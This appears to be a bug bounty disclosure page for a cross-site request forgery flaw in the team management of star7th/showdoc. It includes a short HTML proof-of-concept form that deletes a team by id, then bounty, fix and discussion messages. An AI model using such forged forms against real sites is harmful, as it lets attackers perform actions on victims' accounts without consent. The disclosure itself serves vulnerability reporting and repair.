Cross-Site Request Forgery (CSRF) in star7th/showdoc


Reported on

Nov 21st 2021


You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don't have strict flag.

Proof of Concept

1.replace 38046 with the team id poc.html and click on submit button.

3.after that the team with id 38046 or your replaced team id will be deleted.


  <script>history.pushState('', '', '/')</script>
    <form action="" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
We are processing your report and will contact the star7th/showdoc team within 24 hours. a year ago
star7th validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th marked this as fixed in v2.9.13 with commit 654e87 a year ago
star7th has been awarded the fix bounty
This vulnerability will not receive a CVE
ItemModel.class.php#L1-L40 has been validated
a year ago


I should fix it. You can test it

a year ago


Hey chen

Not fixed and just like before( I logout from the system and login again)

this is a fix commit that have a good fix for strict cookies :

Jamie Slome
a year ago


@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.

a year ago


@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.

Jamie Slome
a year ago


CVE published! 🎊

to join this conversation